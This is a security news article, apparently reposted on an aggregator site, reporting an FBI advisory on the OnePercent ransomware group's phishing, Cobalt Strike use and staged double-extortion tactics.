FBI Issues Advisory on OnePercent Ransomware Group

  /     /     /  
Publicated : 23/11/2024   Category : security


FBI Issues Advisory on OnePercent Ransomware Group


The threat actor has been targeting US companies in dual extortion attacks since fall of last year.



A ransomware operator calling itself the OnePercent group has been attacking US companies since at least November 2020 using the Cobalt Strike post-exploit toolkit and remote PowerShell commands to move laterally on compromised networks.
In an advisory this week, the FBI described the group as using phishing emails with a malicious zip-file attachment as an initial infector vector. The file has typically included a Microsoft Word or Excel document with malicious macros that infect systems with IcedID, a known banking Trojan. The Trojan (which some vendors refer to as BokBok) then downloads additional malware, including Cobalt Strike, on the compromised system.
As has become common with ransomware operators these days, the OnePercent groups attacks have involved double-extortion attempts. The group not only encrypts data but also exfiltrates it and uses the threat of public exposure of the data as additional leverage to try and extract money from victims. Among the tools and infrastructure that the FBI listed the group as using in its campaign are AWS S3 storage buckets, PowerShell, Cobalt Strike, Mimikatz, SharpSploit, and SharpKatz. Many of these are dual-use tools that can be used for legitimate as well as malicious purposes.
The OnePercent groups modus operandi has involved leaving a note on compromised systems informing victims that their data has been both encrypted and stolen. The note instructs the victim organization to contact the threat group via the Tor communication channel to arrange for the ransom payment. If the victim doesnt respond in a week, the attackers switch to contacting them persistently via phone using spoofed numbers and demanding to speak with the companys ransom negotiator. 
If a victim doesnt respond to the phone calls, the threat actor sends an email from a ProtonMail email address threatening to publicly release the victims stolen data, the FBI said.
One Percent Leak
A continued failure to respond or to make the ransom payment within the stipulated time frame results in the attacker releasing a portion of the stolen data — a one percent leak — as proof of intent and capability. That move is then followed by another threat to sell the stolen data in full to rival ransomware operator the Sodinokibi Group (aka REvil), which in turn will auction the data to the highest bidder. 
OnePercent group actors extortion tactics always begin with a warning and progress from a partial leak of data to a full leak of all the victim’s exfiltrated data, the
FBI said in its advisory
.
This ransomware gang is yet another in a seemingly never-ending number of new players in the ransomware scene. Security researchers have attributed the rapidly growing number of players in the space to the easy availability of ransomware-as-a-service (RaaS) operations such as DarkSide, REvil, LockBit, and Netwalker. RaaS offerings — where an operator leases out the use of their ransomware tool and infrastructure in exchange for a portion of ransom payouts — have allowed even novice attackers to deploy relatively sophisticated malware against targets of their choice.
Why Now?
Alec Alvarado, threat intelligence team lead at Digital Shadows says the FBIs reason for releasing an advisory on the OnePercent groups operation is not clear. It is certainly interesting to ponder why the FBI chose the OnePercent group to release a Flash about, as the group doesnt necessarily appear to sway significantly from known ransomware tactics, Alvarado says. 
One likelihood is that the FBI suspects increased activity by the group. Or it was motivated by the limited reporting on the groups activities within the industry so far, he says.
Regardless of the FBIs motive, the OnePercent ransomware groups operations are another example of the cooperation that exists between some ransomware groups. Alvarado notes. Based on the [indicators of compromise] released in the FBI Flash, he says, OnePercent appears to relate in some fashion to the threat actor tracked as UNC2198, reportedly known to distribute either the Maze or Egregor ransomware.

Last News

▸ Beware EMV may not fully protect against skilled thieves. ◂
Discovered: 23/12/2024
Category: security

▸ Hack Your Hotel Room ◂
Discovered: 23/12/2024
Category: security

▸ Website hacks happened during World Cup final. ◂
Discovered: 23/12/2024
Category: security


Cyber Security Categories
Google Dorks Database
Exploits Vulnerability
Exploit Shellcodes

CVE List
Tools/Apps
News/Aarticles

Phishing Database
Deepfake Detection
Trends/Statistics & Live Infos



Tags:
FBI Issues Advisory on OnePercent Ransomware Group